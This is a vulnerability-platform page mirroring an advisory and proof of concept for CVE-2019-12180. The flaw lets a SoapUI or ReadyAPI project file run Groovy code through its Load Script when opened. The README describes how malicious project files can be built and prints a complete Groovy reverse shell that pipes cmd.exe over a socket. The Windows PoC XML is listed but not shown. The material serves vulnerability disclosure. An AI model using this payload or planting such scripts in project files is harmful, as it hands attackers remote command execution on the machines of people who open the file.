漏洞平台

POC详情： c8fc5732fcab707cbfe45ef68021baf4f77f1303

来源

https://github.com/0x-nope/CVE-2019-12180

关联漏洞

标题： SmartBear Software ReadyAPI和SoapUI 输入验证错误漏洞 (CVE-2019-12180)
描述：SmartBear Software ReadyAPI是美国SmartBear Software公司的一款API测试平台。该平台支持功能测试、负载测试和服务虚拟化等功能。 SmartBear Software ReadyAPI 2.8.2版本至3.0.0版本和SoapUI 5.5及之前版本中的Load Script功能存在输入验证错误漏洞。本地攻击者可利用该漏洞在系统上执行任意代码。

描述

Advisory & PoC

介绍

# CVE-2019-12180
Advisory & PoC

SoapUI and ReadyAPI allow you to create or add dynamic contents to test cases
(for example, to calculate a timestamp on the fly) using Apache Groovy Language
scripts. Execution of these scripts can be triggered in many ways and they are
stored inside the XML "Project file" once a project is saved. 

The "Load Script" function allows to create a Groovy script that is launched
once the project file is opened (con:afterLoadScript element of the XML Project
file) without any further user interaction. This behavior can be abused by an
attacker to create malicious project files that, once opened, execute arbitrary
Groovy code on the victim system. Since it is possible to execute system
commands using the Groovy language, this feature can be abused to execute
remote commands effectively.

NOTE: the same goal can be achieved by exploiting any other Groovy script capable
function ("Save script" for example), but this will require additional user
interaction after loading the project file.


Vulnerable Application: 
 - ReadyAPI 3.0.0
 - 2.8.2 and earlier
 - SoapUI 5.5 and earlier

<b>At the time of writing (2020-02-04), this is a 0day vulnerability, since 
(multiple) proposed disclosure dates have passed with no patch release by the
vendor. </b>

Example Groovy Reverse shell (https://gist.github.com/frohoff/fed1ffaab9b9beeb1c76):

<code>

String host="localhost";
int port=8044;
String cmd="cmd.exe";
Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close();
</code>

文件快照


 [4.0K]  /data/pocs/c8fc5732fcab707cbfe45ef68021baf4f77f1303
├── [ 745]  CVE-2019-12180_Wndows_PoC.xml
└── [1.9K]  README.md

0 directories, 2 files

神龙机器人已为您缓存

备注

1. 建议优先通过来源进行访问。

2. 如果因为来源失效或无法访问，请发送邮箱到 f.jinxu#gmail.com 索取本地快照（把 # 换成 @）。

3. 神龙已为您对POC代码进行快照，为了长期维护，请考虑为本地POC付费，感谢您的支持。